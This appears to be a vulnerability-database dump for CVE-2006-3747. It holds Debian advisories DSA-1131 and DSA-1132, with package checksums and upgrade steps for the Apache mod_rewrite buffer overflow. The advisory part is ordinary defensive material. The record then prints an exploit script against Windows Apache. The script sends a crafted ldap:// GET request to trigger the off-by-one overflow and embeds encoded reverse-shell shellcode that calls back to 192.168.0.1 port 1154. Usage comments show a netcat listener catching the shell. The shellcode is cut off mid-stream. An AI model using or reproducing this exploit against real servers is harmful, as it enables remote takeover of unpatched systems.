http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 167712 91d4f8ca1a018c1d772d2436a40c264a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 168454 810be6456b1b49e29c2ad063677df5d7\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 102908 4053b03ba06284397e0a2e049ac0b07e\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 134504 4cf1d17baaceacbd49aff1a5f0386eb9\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 287146 327a38414b6477d2bfc899b6c36814a4\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 33488 a02c59618834f05f05875bfb44db86a8\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 856080 7f25f6e8e6e6861106e349f49de39f3f\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 214658 4542ef6b2b9b2cad21c9b43cc090cc20\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 209732 a77570da8616c950a61c3e1f1774d263\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 213720 0187a654fc3972354c4b1ce9f25b298e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 167700 23b513fe1438e05bfb285c6b2ba5fa88\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 168438 2fdbfc52471761f05ac81c88104df718\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 102074 e3e2f1cce29967a7f16d482c5a12f31e\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 134326 a065ca58466cb424e6fdecf4916a34ab\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 272016 1036f4767ca54dcf7f9ea8a0ccd7219b\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 33484 be5320d7ff7f2535f2c2afcc1c1a0017\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 836920 0217fc29e0cd0c73ffc16321ac76ee67\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 223934 b8fe548deef75a8474c513ffeaef612b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 219814 03b24d5271b0d0392de3cae6a8b2cddc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 223316 b19825c6436769e45e9ff4b304893e0a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 167674 b927beaf64fcf061278749e9112f606b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 168406 2a691c0d5a113e67dbe4428f33850b55\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 95882 f4f2d57ef253b639334593daee4ea458\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 145992 524ec24014483b5380e1f498fc96eb71\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 275226 812a50d7371049f438c8469dd72aaab7\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 33492 e1759ef13bc51722b31ac10f9469ab11\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 802626 7936568d0f0220d40a0c24c020188e92\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 205614 75b026656494f526a4c53c7202ef4a85\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 200878 a9195c31cdba9cd787cad14eba216719\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 204536 f0f6b6b0b5e4222e35deb55b955c1241\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 167688 1f9b82c2aa5ef014de1a00279fba8acc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 168428 1055661a5018ca3698a508dac343a5ef\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 91002 a2c433609f36de5d6d0e8ae5ad367fb2\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 123598 5739e26b7619a2a36a0541288b45e91a\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 260480 d21565096a339f3e4cbff58cf5deb352\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2006-08-01T00:00:00", "published": "2006-08-01T00:00:00", "id": "DEBIAN:DSA-1132-1:6E37C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00220.html", "title": "[SECURITY] [DSA 1132-1] New apache2 packages fix buffer overflow", "type": "debian", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:24:34", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1131-1 security@debian.org\nhttp://www.debian.org/security/ Steve Kemp\nAug 1st, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : apache\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-3747\nCERT advisory : VU#395412\nDebian Bug : 380231\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitary code.\n\nFor the stable distribution (sarge) this problem has been fixed in version 1.3.33-6sarge2.\n\nFor the unstable distribution (sid) this problems will be fixed shortly.\n\nWe recommend that you upgrade your apache package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2.dsc\n Size/MD5 checksum: 1119 8188c2fe660d475970139af295b07b86\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2.diff.gz\n Size/MD5 checksum: 372930 40c5ca3d91d1307a191915459bc94237\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33.orig.tar.gz\n Size/MD5 checksum: 3105683 1a34f13302878a8713a2ac760d9b6da8\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.33-6sarge2_all.deb\n Size/MD5 checksum: 334562 a6a506713c09c27143feffe738aed3f9\n http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.33-6sarge2_all.deb\n Size/MD5 checksum: 1332888 f24fa9421e8dc9acec2467b58468f2dd\n http://security.debian.org/pool/updates/main/a/apache/apache-utils_1.3.33-6sarge2_all.deb\n Size/MD5 checksum: 212626 b9a5198ee442212cdd248be8827400a1\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 428152 a58caae837e1025d97cf44bf8fb23f0f\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 904242 ce2a0e4b97c1926dafdf31e589883995\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 9223072 182f1789104e294f72fede75dc13b875\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 569406 185346b21b2adbc248a06f689f094b97\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 542576 dfe389cdb48d38ee2a27a3a622a6c6e0\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_alpha.deb\n Size/MD5 checksum: 505050 36759af8debeceeebdd083a337e590cb\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 401466 6d45b8e9a23382f6b2eadc28af28e4a4\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 876652 7474a08ccd74235787761b8e1ffe8c0e\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 9162572 b55d8df232edbd900372fe339a065fd1\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 524410 41142b30d22c99476977c339cf071504\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 513708 5377d3aa2ad92e07db2654d3fd3761d1\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_amd64.deb\n Size/MD5 checksum: 492544 2d15619f2db2d39d6abdaf25574fbf4c\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 384260 7785f5fa4d814bd1a1ec946fe007ec53\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 841372 83ed59ba296d64b5b6731c3a57902810\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 8985914 50fc722807a399105950b15e5eaba3b3\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 495910 f7d7a9218c3bdabbf0982b3ec563bca6\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 489556 7645d9195f00f4bf0c655eefaf971dff\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_arm.deb\n Size/MD5 checksum: 479280 e689e83904766cf209049c39fe3ee2d1\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 386664 0f0192626abd5a456bf7b6d43f9f1708\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 860158 60891f21e526885833f7f7fcf43c92e4\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 9124844 9d2e020813d5298c3f4d62dcd8ec6aaa\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 504860 a084ffd32a38948db9dd0692ead50eeb\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 493690 c442e0c156f98044c20a665d989aeca0\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_i386.deb\n Size/MD5 checksum: 486804 3862e6781f044fc2c4ae24170f47fe6f\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 463372 13eb11e0de167d54b6606605ae1ff0f6\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 971834 2be725f2e6b84c10c512a0d804480e33\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 9355772 3b5d28d3d2531719d46c23920dd3e94c\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 627356 247a7da511dae2d5e698f2b424fe24c5\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 585922 aa5d4b2f9bcefe026da9168170e0c819\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_ia64.deb\n Size/MD5 checksum: 532826 9b9c3b43b6e85e92dd2c064871f7d9f3\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 406614 50c84b8682cd3b8af4e0eceaf7fd505a\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 905560 b02464bd2a9c5ca732e0c4f9208baee0\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 9100908 4516c9ad78527b3cb2be9daef76e9566\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 536024 e8ab5a278d1424ef9d68c155ae3a7ab8\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 518824 c6befb0053d4ed7daa9e9f3d1538bbb6\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_hppa.deb\n Size/MD5 checksum: 508750 6beec32a45b93df126f4973619c6076a\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 371072 d4f978e09502b619b7933e23290eaf5e\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 847234 8ca3d2d72183081217ae742327dd49f7\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 8973668 e6614fd4445efa2a29002d5f02d0b7c5\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 448692 e2024a331a75dabd3ff86927a1883cbc\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 477360 43f62ac274ccd93160d1db6d3110ebe6\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_m68k.deb\n Size/MD5 checksum: 489432 df5d49e0e858809966e4395cdfcab073\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 403276 4ff63b289978627f3db22de263e158ef\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 851592 3e0d11bf481c1378ff776062dc2eed70\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 9048564 aa4a667fdc83d41e739b69c949967929\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 485152 0672cc250050d8e0e571ced7cb4420a0\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 509872 09572aa1dd63bd7b1bff9b61d5752358\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_mips.deb\n Size/MD5 checksum: 443532 6efd073b42b13599960f29ff9263892a\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 403652 6906feb21ddb7af2a5ec9d4c2ccd874c\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 849942 5786e24b7849df4eea36f3d3da80a82a\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 9054052 f0d853c8399534429fcd2a3463016ef1\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 485376 9001e3d37ac660635946eb066e50ec78\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 510664 398e615c936d6e72bb443ce3550e57e2\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_mipsel.deb\n Size/MD5 checksum: 443422 e3a6f0ca68df1d8e8f26eef8f23b2822\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 398666 29de2415f45cd033d04c28be500664ee\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 921400 c36acb601638cb0a9961a2f5d95fcb28\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 9252458 aa5f5cdc62365a6951cb6a67e005dc34\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 515350 0d654fea1e92be4c2bb1375b6a51c060\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 510372 15269ec946e59741172a69c8e7ea7557\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_powerpc.deb\n Size/MD5 checksum: 490708 2b1e1ae12a9cb2e8f59b6b8b219d7f9e\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 403204 73201862887af010def1edf24d22594d\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 868450 b84df926a3235d152d8f7f35aa3394ae\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 9183050 1cf5c335b2cf863898c0c84e4e150776\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 490090 b361f3cf52b919b5e92d96f92a77270a\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 514442 d3374e5f0d5cb468409795a1a7c9b8b3\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_s390.deb\n Size/MD5 checksum: 460466 bf56d745cf3b78e3ade0204a718417c6\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 385534 020faf78c7c61702c94d10eb03a07e37\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 849304 2cffd052a21ba9306ebadf4af2f6b734\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 9046234 f32d81e7736df5b65bf9912506b03466\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 504168 e3a5510199db8f05f5a6f3028b82ef11\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 491970 4f9732af9bcf8e6ecc54cb24f65b7d0b\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_sparc.deb\n Size/MD5 checksum: 490256 9c6e61c66d2f8641680f6f7dfe7316fe\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2006-08-01T00:00:00", "published": "2006-08-01T00:00:00", "id": "DEBIAN:DSA-1131-1:123B5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00219.html", "title": "[SECURITY] [DSA 1131-1] New apache package fix buffer overflow", "type": "debian", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache mod_rewrite (Windows x86) - Off-by-One Remote Overflow", "edition": 1, "published": "2007-04-07T00:00:00", "title": "Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-04-07T00:00:00", "id": "EXPLOITPACK:6E3090CD46CEEE08D52992589E824D90", "href": "", "sourceData": "#!/bin/sh\n# Exploit for Apache mod_rewrite off-by-one(Win32).\n#\n# by axis <axis@ph4nt0m>\n# http://www.ph4nt0m.org\n# 2007-04-06\n#\n# Tested on Apache 2.0.58 (Win32)\n# Windows2003 CN SP1\n#\n# Vulnerable Apache Versions:\n# * 1.3 branch: >1.3.28 and <1.3.37\n# * 2.0 branch: >2.0.46 and <2.0.59\n# * 2.2 branch: >2.2.0 and <2.2.3\n#\n#\n# Vulnerability discovered by Mark Dowd.\n# CVE-2006-3747\n# \n# first POC by jack <jack\\x40gulcas\\x2Eorg>\n# 2006-08-20\n# http://www.milw0rm.com/exploits/2237\n#\n#\n# \n# to successfully exploit the vuln,there are some conditions\n# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html\n# \n# \n# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat\n# \n# for more details about the vuln please see:\n# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded\n# \n# \n# no opcodes needed under windows!\n# it will directly run our shellcode\n# \n# my apache config file\n# [httpd.conf]:\n# RewriteEngine on\n# RewriteRule 1/(.*) $1\n# RewriteLog \"logs/rewrite.log\"\n# RewriteLogLevel 3\n# \n# \n# Usage:\n# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141\n# mod_rewrite apache off-by-one overflow\n# \n# [axis@opensystemX axis]$ nc -vv -n -l -p 1154\n# listening on [any] 1154 ...\n# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077\n# Microsoft Windows [\u00a1\u00e3?\u00a1\u00c0? 5.2.3790]\n# (C) \u00a1\u00e3?\u00a8\u00a8\u00a1\u00a7?\u00a8\u00b4\u00a8\u00aeD 1985-2003 Microsoft Corp.\n# \n# D:\\Apache\\Apache2>exit\n# exit\n# sent 5, rcvd 100\n# \n# \n# \n# shellcode \u00b5\u00c4badchar\u00a3\u00ac\u00ce\u00d2\u00d5\u00e2\u00c0\u00ef\u00d3\u00c3\u00b5\u00c4\u00a3\u00ac\u00c6\u00e4\u00ca\u00b5\u00b2\u00bb\u00d0\u00e8\u00d2\u00aa\u00c4\u00c7\u00c3\u00b4\u00b6\u00e0\n# \u00ce\u00d2\u00b8\u00fa\u00b5\u00bd\u00c1\u00bd\u00b8\u00f6badchar\u00ca\u00c7 0x3f\u00ba\u00cd 0x0b \u00c6\u00e4\u00cb\u00fb\u00b6\u00bc\u00ca\u00c7\u00d2\u00d4\u00c7\u00b0\u00c9\u00fa\u00b3\u00c9shellcode\u00cf\u00b0\u00b9\u00df\u00d0\u00d4\u00b1\u00a3\u00c1\u00f4\u00b5\u00c4\n# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b\n#\n\n\necho -e \"mod_rewrite apache off-by-one overflow\"\n\n\nif [ $# -ne 1 ] ; then\n echo \"Usage: $0 webserver\"\n exit\nfi\n\nhost=$1\n\n#use ldap:// to trigger the vuln, \"Ph4nt0m\" is any arbitrary string\necho -ne \"GET /1/ldap://ph4nt0m/`perl -e 'print \"Ph4nt0m\"x5'`\\ \n# %3f to trigger the vuln\n%3fA%3fA%3f\\ \n#string \"CCCC..\" is any arbitrary string, use %3f to trigger the vuln\n#%90 is the machine code we will jmp to(NOP),run shellcode from here\n`perl -e 'print \"C\"x10'`%3fC%3f%90\\ \n# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded\n`perl -e 'print \"\\ \n\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\\n\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x63\\\n\\x58\\x30\\x42\\x30\\x50\\x42\\x6b\\x42\\x41\\x73\\x42\\x32\\x42\\x41\\x41\\x32\\\n\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x79\\x6c\\x51\\\n\\x7a\\x6a\\x4b\\x50\\x4d\\x4d\\x38\\x6b\\x49\\x79\\x6f\\x49\\x6f\\x6b\\x4f\\x65\\\n\\x30\\x4c\\x4b\\x72\\x4c\\x45\\x74\\x51\\x34\\x4e\\x6b\\x71\\x55\\x77\\x4c\\x6c\\\n\\x4b\\x33\\x4c\\x64\\x45\\x33\\x48\\x64\\x41\\x5a\\x4f\\x4c\\x4b\\x72\\x6f\\x36\\\n\\x78\\x4c\\x4b\\x73\\x6f\\x45\\x70\\x66\\x61\\x4a\\x4b\\x53\\x79\\x4e\\x6b\\x44\\\n\\x74\\x4e\\x6b\\x73\\x31\\x38\\x6e\\x55\\x61\\x79\\x50\\x6c\\x59\\x6c\\x6c\\x4b\\\n\\x34\\x6f\\x30\\x74\\x34\\x34\\x47\\x59\\x51\\x5a\\x6a\\x76\\x6d\\x76\\x61\\x6f\\\n\\x32\\x5a\\x4b\\x79\\x64\\x55\\x6b\\x33\\x64\\x51\\x34\\x41\\x38\\x30\\x75\\x4b\\\n\\x55\\x6e\\x6b\\x33\\x6f\\x44\\x64\\x46\\x61\\x7a\\x4b\\x32\\x46\\x6e\\x6b\\x34\\\n\\x4c\\x42\\x6b\\x6e\\x6b\\x73\\x6f\\x77\\x6c\\x54\\x41\\x58\\x6b\\x43\\x33\\x74\\\n\\x6c\\x6c\\x4b\\x4d\\x59\\x50\\x6c\\x74\\x64\\x75\\x4c\\x52\\x41\\x6f\\x33\\x50\\\n\\x31\\x6b\\x6b\\x72\\x44\\x4c\\x4b\\x50\\x43\\x66\\x50\\x6c\\x4b\\x33\\x70\\x64\\\n\\x4c\\x6c\\x4b\\x74\\x30\\x65\\x4c\\x4e\\x4d\\x4e\\x6b\\x53\\x70\\x47\\x78\\x33\\\n\\x6e\\x51\\x78\\x4c\\x4e\\x52\\x6e\\x56\\x6e\\x58\\x6c\\x50\\x50\\x59\\x6f\\x79\\\n\\x46\\x70\\x66\\x62\\x73\\x75\\x36\\x75\\x38\\x66\\x53\\x64\\x72\\x42\\x48\\x53\\\n\\x47\\x32\\x53\\x50\\x32\\x71\\x4f\\x71\\x44\\x49\\x6f\\x48\\x50\\x52\\x48\\x5a\\\n\\x6b\\x48\\x6d\\x6b\\x4c\\x65\\x6b\\x70\\x50\\x4b\\x4f\\x68\\x56\\x61\\x4f\\x4e\\\n\\x69\\x4a\\x45\\x30\\x66\\x6